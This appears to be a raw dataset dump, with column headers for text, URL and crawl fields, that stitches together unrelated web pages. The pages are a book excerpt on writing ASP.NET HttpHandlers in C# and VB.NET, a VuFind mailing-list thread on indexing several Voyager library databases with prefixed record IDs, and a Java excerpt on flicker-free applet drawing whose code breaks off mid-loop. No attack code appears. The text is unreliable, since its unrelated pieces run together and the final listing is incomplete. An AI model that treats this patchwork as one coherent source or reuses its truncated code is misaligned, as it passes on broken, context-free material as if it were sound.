text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
To write an HttpHandler, you create a class that implements the IHttpHandler interface. All of the handlers in Listing 8.1 do this. You might recall from Chapter 2, "Classes: The Code Behind the Objects," that an interface is used to ensure that a well-known means of communicating with some other code is available. For ASP.NET to communicate with an HttpHandler, it must have a couple members defined by the interface. Listing 8.2 shows the basic interface. C# public class MyHttpHandler : IHttpHandler { public void ProcessRequest(HttpContext context) { // do something here } public bool IsReusable { get { return true; } } } VB.NET Public Class MyHttpHandler Implements IHttpHandler Public Sub ProcessRequest(context As HttpContext) ' do something here End Sub Public ReadOnly Property IsReusable() As Boolean Get Return True End Get End Property End Class The ProcessRequest() method is where we do work in response to the request. ASP.NET passes in a reference to the HttpContext object associated with the request. You'll notice in Visual Studio that as soon as you type a period following the context parameter, Intellisense will show you properties that correspond to all the familiar objects you might use in a page (see Figure). You can get information about the request via the Request property, and you can send almost any kind of data you want back down the pipe with the Response property. This is very powerful because you can essentially do anything. If you wanted to divert .aspx file requests to a handler of your own (and had way too much time on your hands), you could implement the entire ASP.NET page factory yourself! The IsReusable property is the other member you'll have to implement in your HttpHandler. It's there to tell ASP.NET whether the instance of the handler can be reused from one request to the next, or if it should create a new instance each time. Generally it's best for this property to return true, especially if the HttpHandler will service many requests. However, if some user-specific action is occurring in the handler that you don't want the next user to use, you should cause the property to return false. In order for ASP.NET to process any request at all, it must receive the request via IIS. This was covered in Chapter 6. After ASP.NET gets the request, it must designate which HttpHandler will process the request. Listing 8.1 showed the defaults listed in the machine.config file. Listing 8.3 shows the relevant parts of a web.config file to add the HttpHandler to your application. <?xml version="1.0" encoding="utf-8" ?> <configuration> <system.web> <httpHandlers> <add verb="*" path="*.jpg" type="MyClass, MyDll" /> </httpHandlers> </system.web> </configuration> The element that does the actual work is the <add /> element. The verb attribute indicates the types of requests that are covered (GET or POST), and you can use an asterisk as a wildcard. The path attribute describes the file path of the request. In this example we're using a wildcard with ".jpg" to indicate that we want to handle all requests for .jpg files, but you could just as easily specify anything else, such as "mypage.aspx." The <add /> elements are considered in the order that they appear, so a request that fits the path of two elements will be serviced by the class in the last entry. Finally, the type attribute indicates the name of the class implementing IHttpHandler and the assembly name in which it resides, looking in the /bin folder. Keep in mind that the class name should be fully qualified, meaning that the namespace should be
http://codeidol.com/community/dotnet/handling-file-types-of-your-own/16968/
CC-MAIN-2017-13
refinedweb
608
64.51
, I was able to get a simple 2-ILS system working at Auburn on our dev server. Here's what I did. *. Setup a solrmarc import that prepends an ILS-specific prefix to each record. You can get something working quickly by modifying the 'id' rule in the solrmarc marc.properties to: id = script(customId.bsh),getCustomId("PREFIX") where customId.bsh has: import org.marc4j.marc.Record; import org.marc4j.marc.ControlField; /** * Generate a custom id as prefix + 001 */ public String getCustomId( Record record, String prefix ) { return prefix + ((ControlField) record.getVariableField( "001" )).getData(); } ......................................... *. I wrote a MultiVoyager.php driver that reads MultiVoyager.ini and maintains a list of Voyager.php driver instances. I attached a copy of MultiVoyager.ini, or you can clone a copy out of our Mercurial repository: The MultiVoyager.ini file maps a prefix to and ILS config - an example follows. The "EMPTY" keyword indicates no prefix. This example works for records that look like 12345 (no prefix) and AUM12345 (AUM prefix). MultiVoyager.ini: [Catalog] configList = EMPTY,AUM defaultDriver = EMPTY [EMPTY] host = bla port = 1521 service = VGER user = bla password = bla database = bla pwebrecon = [AUM] host = bla port = 1521 service = VGER user = bla password = bla database = bla pwebrecon = ........................................ *. I had to patch a few other php lines here and there too to get the ajax load of holding status working right, modify Voyager.php to accept a config in the constructor rather than load Voyager.ini, ... - stuff like that. The complete patch is here, but our vufind code is pretty far out of date compard to vufind.org: ........................ Hope this code works for you - let me know how it goes. Cheers, Reuben -----Original Message----- From: Reuben Pasquini [mailto:rdp0004@...] Sent: Monday, October 18, 2010 1:20 PM To: Harmon, Kelly; vufind-general@...; Osullivan L. Subject: Re: [VuFind-General] Anyone merging more than one VoyagerDatabaseintoVuFind? At Auburn we currently only index one Voyager database, but we also OAI harvest other collections. An easy trick is to just prepend a unique prefix before the normal bib-id. For example - we have 'SLEDGE143' and '143' records: I think you'll have to hack at least 2 things to get this scheme to work: *. Modify Drivers/Voyager.php to manage connections to multiple Oracle servers, and choose a connection based on the id-prefix. *. Modify the solrmarc vufind.properties file, and replace id = 001, first with something like id = my001WithPrefixFunction ... something like that. I'd like to do something like this myself, but it keeps falling off the end of my TODO list. Let me know if you need help implementing this, and I'll set aside a day or two to give it a try. Cheers, Reuben >>> "Osullivan L." <L.Osullivan@...> 10/18/2010 10:56 AM >>> Hi Kelly, Here at SWWHEP we don't use two Voyager instances but we do use three different databases. We have a marc merge script which creates a unique id for each merged record and a system id in the solr index where we store the individual bib ids. Have a look at the marc records at - we have used the 969 field to store the bib ids. If you thing this may be of use to you, let me know and we can discuss things further. Kind Regards, Luke O'Sullivan From: Harmon, Kelly [mailto:Kelly.Harmon@...] Sent: 18 October 2010 16:44 To: vufind-general@... Subject: [VuFind-General] Anyone merging more than one Voyager Database intoVuFind? We're building our index from two separate Voyager databases. The problem, however, is that many of the same bib IDs are being used in both DBs, so when we create the index, some records are being overwritten. We've done some marc-field juggling to get this to work, but are realizing that if we want to use all Vufind functionality, this isn't the way to go. Is anyone else doing this? What solutions have you employed? Thank you. Kelly Kelly A. Harmon Webmaster, National Agricultural Library 10300 Baltimore Avenue Beltsville, MD 20705 (301) 504-5788 I've done something very similar and even wrote my own multi-ils multi-database driver for the Keystone Library Network. Along with the suggestions given above, I've had Demian commit a modified import script which allows you to specify the import properties file for this very purpose. Simply create an import properties file for every ils/database/institution, and have each one alter the id field to prepend the identifier that everyone's been talking about using the bsh script. Then, when you're importing your marc file, simply run `import.sh -p ./import/this_inst.properties path/to/first_marc.marc` and then `import.sh -p ./import/other_inst.properties path/to/other_marc.marc` Unfortunately I no longer work for KLN, and don't have access to the original code, but my successor may come along one day and chime in, as I told him to before leaving. -Casey Boone, former KLN/PASSHE programmer I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details
https://sourceforge.net/p/vufind/mailman/message/26523919/
CC-MAIN-2017-04
refinedweb
870
66.54
Treasury has released consultation draft legislation on GST for sales of "new residential premises" and "potential residential land" (subdivided residential lots). As explained in detail further below, once enacted, the new laws will require purchasers of new residential premises and potential residential land to withhold 1/11th of the purchase price as GST (including for margin scheme sales). That withheld amount must be paid to the ATO on settlement. The consultation period is only two weeks, with any comments required to be provided to Treasury by Monday, 20 November 2017. What is driving this change? The Government wants to prevent the loss of GST revenue to "phoenix" operators. At its most simple, a phoenix arrangement involves a new company that is established to undertake a specific residential development project. During the development phase the company will claim GST refunds for land purchase and development costs. On completion the company will sell the new residential premises or residential lots, which is a taxable supply and subject to GST. However, in a phoenix arrangement the company will not remit the GST to the ATO and instead distributes all proceeds to another company or related parties. By the time the ATO issues assessments for the unpaid GST, it is often too late. The company has no assets and it may be in the process of being wound up. In the absence of the proposed reforms, the Budget Papers estimate lost GST from phoenix activities will be $660 million over the next three years. The new measures are intended to beat phoenix operators by requiring purchasers to withhold GST from the purchase price and to pay this amount directly to the ATO. When will the new measures start? The proposed start date is 1 July 2018. For contracts signed prior to that date, the new measures will not apply if the purchase price is paid before 1 July 2020. This effectively provides a two year transition window for current off-the-plan sales. It should be noted that all contracts which complete after 1 July 2020 will be caught, even if the contract is entered before 1 July 2018. This will be relevant for off-the-plan sales that are not expected to complete for another 2.5 years or more. Is there are any exemption for developers with a good GST compliance history? No. The current draft legislation applies to all developers selling new residential premises or potential residential land. It is arguable that developers with a good compliance history should be exempt from the withholding measures. One way to achieve this could be through the ATO issuing a GST "clearance certificate" to exempt developers. The clearance certificate could be provided to the purchaser ahead of settlement to make it clear that GST withholding does not apply. Vendors must issue a notice to purchasers The draft legislation requires vendors to issue a notice to purchasers at least 14 days prior to settlement advising whether the purchaser must withhold. If withholding is required, the notice must include details about the vendor (name and ABN), the amount to be withheld and the date the amount must be paid to the ATO. It is presently unclear whether a vendor must issue a notice in relation to any residential sale, or whether a notice is only required for a taxable supply of new residential premises. The explanatory memorandum suggests that all vendors of residential premises must issue a notice, but this is not reflected in the wording of the relevant provisions in the draft legislation. It is expected that this will be clarified when the final legislation is released. Failure to issue the notice is a strict liability offence. The applicable penalty is 100 units (at $210 per unit = $21,000). This applies per notice (i.e. per contract). It is a defence if the vendor honestly and reasonably believed the property being sold was not a "new residential premises". It is expected that most developers will look to include the required notice in the contract for sale. Purchasers must issue a notice to ATO twice The draft legislation states that if a purchaser is required to withhold GST, the ATO must be notified of this at least five days prior to the withholding payment (i.e. at least five days prior to settlement). The ATO must also be notified a second time on the settlement date when the withheld amount is paid. Ultimately it will be a purchaser's responsibility to determine if withholding applies, and if so, the amount to be withheld. However, if the purchaser does not receive any notice advising that withholding applies, or relies on a notice stating that withholding is not required, this will be a factor that is take into account in determining whether any penalties should apply for failure to make the required notifications. How does the withholding work for margin scheme sales? A developer may have a reduced GST liability if the "margin scheme" applies to the sale of a new residential premises or residential lot. Regardless, the purchaser will be required to withhold and remit 1/11th of the purchase price to the ATO. This obviates the need for the developer to disclose its margin to the purchaser. Of course, this also means that GST will be overpaid on margin scheme sales. This will have a cash flow impact on developers. Developers will need to recover the overpayment directly from the ATO. For developers that account for GST on a monthly basis, this will be done via the developer's next GST return (BAS). For developers that have quarterly tax periods, the developer will have the option to apply to the ATO for a refund prior to lodging their next quarterly GST return. This proposed refund mechanism is new and an attempt to reduce the cash flow impact of the proposed measures. Will the vendor still have to report a GST liability on the sale? Yes, under the proposed arrangements the developer will still be required to report a GST liability in its GST return (BAS) for the relevant sale. However, the developer will be entitled to a credit for the GST that has been withheld and remitted to the ATO on the developer's behalf. Excluding any minor discrepancies (for example, in relation to settlement adjustments), the GST liability and credit should generally net out to nil in the same GST return. How does the withholding work for instalment contracts? Where withholding applies, the purchaser's withholding obligation is triggered on payment of the first part of the purchase price, excluding the deposit. Where the purchase price is payable in instalments, this means the GST on the total purchase price must be withheld from the first instalment. For example, assume a property is sold for $11 million, including GST of $1 million. The purchaser will pay a deposit of $1 million on exchange, with the balance of the purchase price being paid in two instalments of $5 million six months apart. The payment of the deposit will not trigger any GST withholding. However, the payment of the first instalment of $5 million will trigger GST withholding on the total purchase price. That is, the purchaser will be required to withhold $1 million from the $5 million instalment payment. No further GST would need to be withheld when the deposit is released and the final instalment paid. Does the withholding apply to the contract price or the adjusted purchase price? It is common for the contract price to be adjusted on settlement to take into account amounts such as land tax, water rates and council rates. Under the draft legislation, the withholding will be applied to the adjusted purchase price. This may raise practical difficulties if the total of all settlement adjustments is not known when the vendor is required to issue a notice to the purchaser (at least 14 days prior to settlement). This is an issue that will likely be raised in consultation and the requirements in the final legislation may be different. What is the impact on banks and other property financiers? Secured lenders who finance residential developments take security over the property and rank ahead of unsecured creditors, including the ATO. If a development project is underperforming, secured creditors may be entitled to all of the proceeds received by the developer, including the GST component of the purchase price. If the proposed measures are enacted, the ATO will instead receive GST payments ahead of secured creditors. To illustrate, assume a developer sells a new apartment for $550,000, including GST of $50,000. Presently a bank may be entitled to 100% of those proceeds, being the full $550,000. If the developer has no other funds, the ATO may miss out on the GST. Under the proposed measures the $50,000 of GST will be paid by the purchaser directly to the ATO. The developer will only receive the net proceeds of $500,000. Those net proceeds may be all that the bank can recover from the developer. Accordingly it would be the bank, not the ATO, who misses out on the $50,000 of GST in this example. The draft legislation includes provisions which are intended to provide some transitional relief in the context of PDAs. PDAs are arrangements whereby a landowner pays a developer for undertaking a residential development on the landowner's property. The developer is paid from the proceeds that the landowner receives on the sale of the new premises / lots (as the case may be). Typically PDAs involve complex payment distribution arrangements (often referred to as a "payment waterfall"). Ideally PDAs entered into prior to 1 July 2018 (or some earlier date) would not be subject to the proposed measures, so that any existing payment waterfall arrangements are not disturbed. The proposed transition measures for PDAs do not currently go this far. Vendors will want certainty that any withheld GST has in fact been remitted to the ATO by the purchaser. Conversely, purchasers will want the new arrangements to occur painlessly with the funds simply flowing to the required party (developer and ATO) on settlement. These are additional reasons why electronic settlement solutions such as PEXA will be increasingly important going forward. Consultation ongoing As noted above, submissions can be made to Treasury on the reform proposal through to Monday, 20 November 2017. Interested parties, including the Property Council of Australia, are expected to make submissions on a number of key issues, including continuing to push for exemptions for developers with an excellent GST compliance history. Once the legislation is finalised, developers will need to ensure that they have contracts and systems in place to ensure compliance from 1 July 2018.
https://www.lexology.com/library/detail.aspx?g=522be7b3-7623-443e-a522-782552f35811
CC-MAIN-2019-04
refinedweb
1,783
51.99
My code is divided into several files, say A.jl, B.jl, C.jl, each of which defines a single module, say A, B, C. Inside C.jl there are declarations like this: import A.myfunction1 import B.myfunction2 In 0.6.2, I was able in the REPL to issue instructions in this order: include("A.jl") include("B.jl") include("C.jl") and then my code would run. In 0.7-DEV, module C can’t find b.myfunction2. it appears that C.jl now must qualify the import statements with Main: import Main.A.myfunction1 import Main.B.myfunction2 in order to support this workflow. Is this correct? Why the change? I would rather not explicitly refer to Main in the source files since I might reorganize my code later to look for the modules elsewhere, e.g., using the Package mechanism.
https://discourse.julialang.org/t/loading-modules-at-the-repl-in-0-7-is-it-different/9190
CC-MAIN-2022-21
refinedweb
145
72.22
The Java Specialists' Newsletter Issue 2342015-11-20 Category: Concurrency Java version: Java 8 GitHub Subscribe Free RSS Feed Welcome to the 234th edition of The Java(tm) Specialists' Newsletter, written during various flights at 30000 feet. Last weekend I was in Graz, Austria, in between two courses. On the Saturday I decided to take advantage of the stunning weather to head up the local Schoeckl mountain. Prior to starting, I asked my friend Holger whether a lot of people were walking up there. "Oh yes, half of Graz, don't worry." I did not want to go hiking in remote areas, lest something happen and I get into trouble. Holger kindly sent me a nice route I could follow on Endomondo. All keen I set out early on Saturday morning, hoping to still get some parking at the Schoecklkreuz. Unfortunately I had forgotten to load the route into Endomondo prior to leaving the hotel, which I discovered when I parked my car. I thus had to follow the sign posts along the way. The first bit was OK, but then I got to a place where I wasn't quite sure. There were these red circles on the one sign, but I didn't notice them on the way up. The path looked OK, so I headed up. (I found out at the summit that red circle means - "Mittelschwierige Bergwege. Ausdauer und Trittsicherheit erforderlich"). A bit later, I saw some Austrians walk up the same route behind me, so I was fairly confident that I had made the right call. The path crossed a small road and then kept on going straight up through the forest. It did seem odd to me how many pine needles were lying on the path. Straight up did look like the shortest distance to get to the summit. So I trudged on. After what felt like a very long time, I checked my map and discovered that I had only gone up 1/3 of the way! And of course the Austrians who were behind me had decided to go along the small road instead of a goat path up the mountain. Down didn't sit well with me. First off there was my pride. Secondly walking down a treacherous path is more dangerous than up. So I kept on going. Fortunately when I checked the map a second time I was very close to the top. It was a very interesting little walk up the hill actually and I don't regret it, but it was a bit foolish. The pine needles did tell me that. It all reminded me of the poem "The Road Not Taken" by Robert Frost, where he ends with: "Two roads diverged in a wood, and I - I took the one less traveled by, and that has made all the difference." NEW: Please see our new "Extreme Java" course, combining concurrency, a little bit of performance and Java 8. Extreme Java - Concurrency & Performance for Java 8. In May this year, my esteemed friend and colleague Maurice Naftalin and I headed off to Israel to present my Extreme Java - Concurrency and Performance for Java 8 to a bunch of smart Intel engineers. As the author of the best-selling book on Generics and Collections, Maurice has a great command of the English language. This, coupled with his vast experience in software engineering, is extremely useful in helping answer some of the tougher questions. We usually tag-team each other, with me preferring to answer questions in my native language, Java. I was flattered that Intel would invite me to teach them. They also enjoyed the course a lot, with my favourite unsolicited comment being: "The three days that we've spent together were amazing. Java is our bread and butter and yet we've learnt many new things and techniques which I'm sure that will help us in the future." - Noam A. During the course, we got to know all the students quite well, so when I received an email from Dudu Amar in August, telling me that String.compareTo() sometimes gave incorrect results, I knew that I should take his claims seriously. He had found an issue in production where someone was comparing Strings with .compareTo() to determine equality, rather than .equals(), and it would occasionally spit out 0 when they were actually different. Strangely, the failures only happened on one of his machines. They had lots of other similar machines in production. We did a binary search through Java versions to try and figure out if this failure had been introduced at some specific time. After some testing, Dudu found that it did not happen in Java 1.7.0_25-64, but it did from 1.7.0_40-64 onwards. It also failed in all Java 8 versions he tried. Usually knowing the exact version that an error starts appearing helps narrow down which change might have caused the error. Java has special intrinsic functions for Strings, including compareTo(). Thus the code you see in the String.java file is not what will really be executed. Sadly, it being Intel with a huge amount of hardware to play with, someone went and upgraded all the CPUs, with the result that Dudu's program no longer fails. We are thus looking for someone, anyone, who can make this program fail on their machine, so that we can keep on trying to figure out what caused it. Please contact me if this fails on your machine. We would like to try some additional tests to narrow down the exact cause. import java.util.concurrent.*; public class PXMLTag { public final String m_type; private static String[] m_primitiveTypes = { "java.lang.String", "boolean", "int", "long", "float", "short"}; private static String[] m_allTypes = { "java.lang.String", "boolean", "int", "long", "float", "java.util.Vector", "java.util.Map", "short"}; public PXMLTag(String type) { this.m_type = type; } public boolean isPrimitiveType() { for (int i = 0; i < m_primitiveTypes.length; i++) { String type = m_type; String primitiveType = m_primitiveTypes[i]; if (type.compareTo(primitiveType) == 0 && notReallyPrimitiveType(type)) { System.out.println("This odd case"); System.out.println("type '" + type + "'"); System.out.println("currentPrimitiveType '" + primitiveType + "'"); System.out.println("They are equal? " + type.equals(primitiveType)); System.out.println("They are compared " + type.compareTo(primitiveType)); System.out.println("m_type '" + m_type + "'"); System.out.println("m_primitiveType[i] '" + m_primitiveTypes[i] + "'"); System.out.println("They are equal? " + m_type.equals(m_primitiveTypes[i])); System.out.println("They are compared " + m_type.compareTo(m_primitiveTypes[i])); return true; } } return false; } public static boolean notReallyPrimitiveType(String m_type) { return m_type.contains("Vector") || m_type.contains("Map"); } public static String getRandomType() { return m_allTypes[ ThreadLocalRandom.current().nextInt(m_allTypes.length)]; } public static void main(String[] args) { int threads = 1; if (args.length == 1) { threads = Integer.parseInt(args[0]); } for (int i = 0; i < threads; i++) { Thread t = createThread(); t.start(); } } private static Thread createThread() { return new Thread(new Runnable() { @Override public void run() { while (true) { PXMLTag tag = new PXMLTag(getRandomType()); if (tag.isPrimitiveType() && notReallyPrimitiveType(tag.m_type)) { System.out.println(tag.m_type + " not really primitive!"); System.exit(1); } try { Thread.sleep( ThreadLocalRandom.current().nextInt(100)); } catch (InterruptedException e) { return; } } } }); } } The code failed even with just one thread, but it took longer than with 5 threads. Interestingly, we can turn off intrinsics of compareTo() in the String with the VM parameter -XX:DisableIntrinsic=_compareTo. (Thanks to Aleksey Shipilev for that tip.) We tried that and the program did not fail. -XX:DisableIntrinsic=_compareTo This was the first example of some very strange goings-on in Java code that could only be explained as a race-condition between our code and the JVM. I know that shouldn't happen. But it certainly seems to. As I mentioned, I took Dudu's report seriously as he had attended my course and I knew that he was smart. I sometimes get slightly "less smart" requests from programmers who think it would be cool if I did their homework for them. My latest was a guy from South Africa asking if I wouldn't mind solving a programming task he had for a job interview! Sometimes when I feel playful I do a Socrates - ask questions that force them to think about the exercise themselves. Usually my questions take more effort to answer than the original homework assignment. About a year ago someone sent me his homework assignment. He was studying computer science at some university in darkest Africa. His answer was so far off the mark that I gave him the following advice: "Programming is probably not the right career for you. If you struggled with that exercise, then it's not the right thing for you to be doing as a career. I think I would have been able to figure out that exercise when I was about 15 or 16 years old. Sorry for being harsh, but I don't want to get your hopes up." I expected to never hear from him again. I knew it was a cruel thing to say to someone who had told me: "help me actualize my dreams in programming" I was rather surprised when I received an email from him about six months later. He told me that even though he could've easily been offended, he chose not to and took my advice. Instead of programming, he changed his focus and is now a database administrator and absolutely loves his work. I would be useless as a db admin and I admire him for being so mature to listen without getting angry. Well done mate! Back to race conditions between our code and the JVM :-) Another very smart ex-student of mine is Dr Wolfgang Laun. He sent me a code sample that he found on StackOverflow. This code started failing sporadically on the JVM from version 1.8.0_40 onwards. (Actually, isn't that a funny coincidence? Dudu's race condition happened after 1.7.0_40. Maybe 40 is to Java what is to us the number 13?) Before I show you the code (slightly modified from the original StackOverflow example), I would like to show just an excerpt that will make it clear that this simply should not fail: double array[] = new double[1]; // some code unrelated to array[] array[0] = 1.0; // some more code unrelated to array[] if (array[0] != 1.0) { // could not possibly be true if (array[0] != 1.0) { // and we should definitely not get here either! } else { // I never saw the code get into this else statement } } Seeing the code above, it should be clear that if we have just set the array[0] element to 1.0, that it would make no sense for it to be anything else but 1.0. In fact it might come back as 0.0! import java.util.*; // based on // java-8-odd-timing-memory-issue public class OnStackReplacementRaceCondition { private static volatile boolean running = true; public static void main(String... args) { new Timer(true).schedule(new TimerTask() { public void run() { running = false; } }, 1000); double array[] = new double[1]; Random r = new Random(); while (running) { double someArray[] = new double[1]; double someArray2[] = new double[2]; for (int i = 0; i < someArray2.length; i++) { someArray2[i] = r.nextDouble(); } // for whatever reason, using r.nextDouble() here doesn't // seem to show the problem, but the # you use doesn't seem // to matter either... someArray[0] = .45; array[0] = 1.0; // can use any double here instead of r.nextDouble() // or some double arithmetic instead of the new Double new Double(r.nextDouble()); double actual; if ((actual = array[0]) != 1.0) { System.err.println( "claims array[0] != 1.0....array[0] = " + array[0] + ", was " + actual); if (array[0] != 1.0) { System.err.println( "claims array[0] still != 1.0...array[0] = " + array[0]); } else { System.err.println( "claims array[0] now == 1.0...array[0] = " + array[0]); } System.exit(1); } else if (r.nextBoolean()) { array = new double[1]; } } System.out.println("All good"); } } Output on all Java 8 versions from 1.8.0_40 to 1.8.0_72-ea, and also 1.9.0-ea was sometimes: claims array[0] != 1.0....array[0] = 1.0, was 0.0 claims array[0] now == 1.0...array[0] = 1.0 The most likely reason for this bug is a race condition between on-stack-replacement (OSR) and our code. OSR does a hot-swap of our method that is currently at the top of the stack with faster, more optimized code. OSR is usually not the fastest machine code. To get that, we need to exit completely from the method and come back in again. For example, consider this class OptimizingWithOSR: public class OptimizingWithOSR { public static void main(String... args) { long time = System.currentTimeMillis(); double d = testOnce(); System.out.println("d = " + d); time = System.currentTimeMillis() - time; System.out.println("time = " + time); } private static double testOnce() { double d = 0; for (int i = 0; i < 1_000_000_000; i++) { d += 0; } return d; } } When we run this code with -XX:+PrintCompilation, we see that our testOnce() method is compiled, but not main(). This makes sense, since we hardly execute any code in main(). It all happens in testOnce(), but only once. Here is the output on my machine: 84 73 % 3 OptimizingWithOSR::testOnce @ 4 (22 bytes) 84 74 3 OptimizingWithOSR::testOnce (22 bytes) 84 75 % 4 OptimizingWithOSR::testOnce @ 4 (22 bytes) 86 73 % 3 OptimizingWithOSR::testOnce @ -2 (22 bytes) The "%" means that it is doing on-stack-replacement. Now in terms of performance, with the default -XX:+UseOnStackReplacement my code runs in about 850ms. If I turn it off with -XX:-UseOnStackReplacement, it runs in 11 seconds and we do not see testOnce() in the compilation output. It would be easy to jump to the conclusion that OSR is essential and that it would make all our code run gazillions of times faster. Nope. OSR will mostly make large monolithic code run a bit faster. Microbenchmarks, which are anyway unreliable at best, could also complete more quickly. But well-structured, well-factored code will not see much benefit. Thus if you are a good Java developer, you can safely turn it off in production without suffering any slowdown. I refactored the code a bit by breaking the long loop into three and then extracting each of the loops into separate methods: public class OptimizingWithNormalHotspot { public static void main(String... args) { for (int i = 0; i < 10; i++) { test(); } } private static void test() { long time = System.currentTimeMillis(); double d = testManyTimes(); System.out.println("d = " + d); time = System.currentTimeMillis() - time; System.out.println("time = " + time); } private static double testManyTimes() { double d = 0; for (int i = 0; i < 1_000; i++) { d = unrolledTwo(d); } return d; } private static double unrolledTwo(double d) { for (int j = 0; j < 1_000; j++) { d = unrolledOne(d); } return d; } private static double unrolledOne(double d) { for (int k = 0; k < 1_000; k++) { d = updateD(d); } return d; } private static double updateD(double d) { d += 0; return d; } } The code now runs exactly the same, whether I have OSR turned on or not. Thus my recommendation would be to run production systems that are using Java 1.8.0_40 or later with OSR turned off with the switch -XX:-UseOnStackReplacement. Of course you need to test that you don't have any performance degradation, but I would doubt it. Please let me know if you do. The other race condition I mentioned at the start of this newsletter is more nebulous. Please shout if you manage to reproduce it on your hardware. Interestingly, the Azul's Zulu virtual machine has exactly the same bug. It is to be expected, as their intention is to have an identical build to the OpenJDK, but with additional support. I went to see the Danube yesterday with my friend Frans Mahrl who lives in "Orth an der Donau". The level is the lowest it has been since they started recording about 400 years ago. A bit more and we'll be able to wade across. Kind regards from a sunny Crete Heinz Concurrency Articles Related Java Course
http://www.javaspecialists.eu/archive/Issue234.html
CC-MAIN-2016-26
refinedweb
2,663
66.44
Edit Article wikiHow to Make a Countdown Program in Python This article will show you how to create a simple countdown program with the programming language Python. Python is easy to learn, but this article is aimed at intermediate users, rather than beginners. Steps - 1Open your text editor. - 2Go to the file menu and click on New Window or just press Ctrl +N. - 3Import the 'time' module. To do this, type " import time". This will import the time module. - 4Use the 'DEF' function to define a countdown. Give the function a name of your choice. This article will be using 'countdown,' so the code would be " def countdown(t):." Remember to leave four spaces after the colon. - 5Write a 'while' function to start your countdown loop. Type in the code " while t > 0:" This will cause the program to, while the alphabet is defined as greater than zero, perform this function: " print(t)t = t -1." The number will be constantly decremented as the function progresses and completes a loop cycle. - 6Add the finishing touches. Type in the following code to print out 'BLAST OFF!' when the countdown reaches zero. " <4 spaces> if t == 0:<4 spaces>print("BLAST OFF!")." - 7Add the number you want to start the countdown from. Call the function 'countdown' and, in parentheses, enter the number you want. For example, if you want a 50 second delay, your code should be " countdown(50)." - 8Check your finished code. It should look like this: import time def countdown(n) : while n > 0: print (n) n = n - 1 if n ==0: print('BLAST OFF!') countdown(50) Community Q&A Search - I keep getting the following error: "expected an indented block." What have I done wrong?wikiHow ContributorYou need to press the "Tab" key to indent, so if you were doing an "if" loop. you would do: if a = b: print("Indentation is the space before print") Ask a Question If this question (or a similar one) is answered twice in this section, please click here to let us know. Article Info Categories: Programming Thanks to all authors for creating a page that has been read 6,090 times. Did this article help you?
http://www.wikihow.com/Make-a-Countdown-Program-in-Python
CC-MAIN-2017-04
refinedweb
364
76.11
Does anyone know how to set up the AI to always lose? or something.... Does anyone know how to set up the AI to always lose? or something.... Hello! Can someone please give me any advice! In the java game Pong, how do you defeat the computer? What is the code, method, or whatever that allows you to defeat the comp. please help me i need to turn this in for class. I need help. Anything... Here it is; public class Car { private String make; private String model; private int year; public Car() { I'm so confused and I really need someone's assistance. I cant express how much I'd appreciate it. here is my code! public class Airplane { private String make; private String model;...
http://www.javaprogrammingforums.com/search.php?s=4acbb94b779904a5425db9c0775c44da&searchid=1461224
CC-MAIN-2015-14
refinedweb
126
85.49
#include <nng/protocol/pipeline0/pull.h> nng_pull(7) NAME nng_pull - pull protocol SYNOPSIS DESCRIPTION (protocol, pull) The pull protocol is one half of a pipeline pattern. The other half is the push protocol. In the pipeline pattern, pushers distribute messages to pullers. Each message sent by a pusher will be sent to one of its peer pullers, chosen in a round-robin fashion from the set of connected peers available for receiving. This property makes this pattern useful in load-balancing scenarios. Socket Operations The nng_pull0_open() functions create a puller socket. This socket may be used to receive messages, but is unable to send them. Attempts to send messages will result in NNG_ENOTSUP. When receiving messages, the pull protocol accepts messages as they arrive from peers. If two peers both have a message ready, the order in which messages are handled is undefined. Protocol Versions Only version 0 of this protocol is supported. (At the time of writing, no other versions of this protocol have been defined.) Protocol Options The pull protocol has no protocol-specific options. Protocol Headers The pull protocol has no protocol-specific headers.
https://nng.nanomsg.org/man/tip/nng_pull.7.html
CC-MAIN-2021-04
refinedweb
187
58.58
getpgid() Get a process group ID Synopsis: #include <unistd.h> pid_t getpgid( pid_t pid ); Arguments: - pid - The ID of the process whose process group ID you want to get. Library: libc Use the -l c option to qcc to link against this library. This library is usually included automatically. Description: The getpgid() returns the group ID for the process specified by pid. If pid is 0, getpgid() returns the calling process's group ID. In order to get the group ID of a process outside the calling process's session, your process must have the PROCMGR_AID_GETID ability enabled. For more information, see procmgr_ability() . The following definitions are worth mentioning: - Process - An executing instance of a program, identified by a nonnegative integer called a process ID. - Process group - A collection of one or more processes, with a unique process group ID. A process group ID is a positive integer. Returns: A process group ID for success, or (pid_t)-1 if an error occurs. Errors: If an error occurs, errno is set to: - EPERM - The calling process doesn't have the required permission; see procmgr_ability() . - ESRCH - The process specified by pid doesn't exist.
https://developer.blackberry.com/playbook/native/reference/com.qnx.doc.neutrino.lib_ref/topic/g/getpgid.html
CC-MAIN-2021-39
refinedweb
192
66.44
Having learned to walk, let's try a jog. In this section, we'll look at some techniques for doing fast and flicker-free drawing and painting. If you're interested in animation or smooth updating, you should read on.[4] [4] At this point, you still have to build your own animation software. JavaSoft will be releasing an animation package as part of the Java Media APIs. [4] At this point, you still have to build your own animation software. JavaSoft will be releasing an animation package as part of the Java Media APIs. Drawing operations take time, and time spent drawing leads to delays and imperfect results. Our goal is to minimize the amount of drawing work we do and, as much as possible, to do that work away from the eyes of the user. You'll remember that our TestPattern applet had a blinking problem. It blinked because TestPattern performs several, large, area-filling operations each time its paint() method is called. On a very slow system, you might even be able to see each shape being drawn in succession. TestPattern could be easily fixed by drawing into an off-screen buffer and then copying the completed buffer to the display. To see how to eliminate flicker and blinking problems, we'll look at an applet that needs even more help. TerribleFlicker illustrates some of the problems of updating a display. Like many animations, it has two parts: a constant background and a changing object in the foreground. In this case, the background is a checkerboard pattern and the object is a small, scaled image we can drag around on top of it, as shown in Figure 13.6. Our first version of TerribleFlicker lives up to its name and does a very poor job of updating. import java.awt.*; import java.awt.event.*; public class TerribleFlicker extends java.applet.Applet implements MouseMotionListener { int grid = 10; int currentX, currentY; Image img; int imgWidth = 60, imgHeight = 60; public void init() { img = getImage( getClass().getResource(getParameter("img")) ); addMouseMotionListener( this ); } public void mouseDragged( MouseEvent e ) { currentX = e.getX(); currentY = e.getY(); repaint(); } public void mouseMoved( MouseEvent e ) { }; // complete MouseMotionListener public void paint( Graphics g ) { int w = getSize().width/grid; int h = getSize().height/grid; boolean black = false; for ( int y = 0; y <= 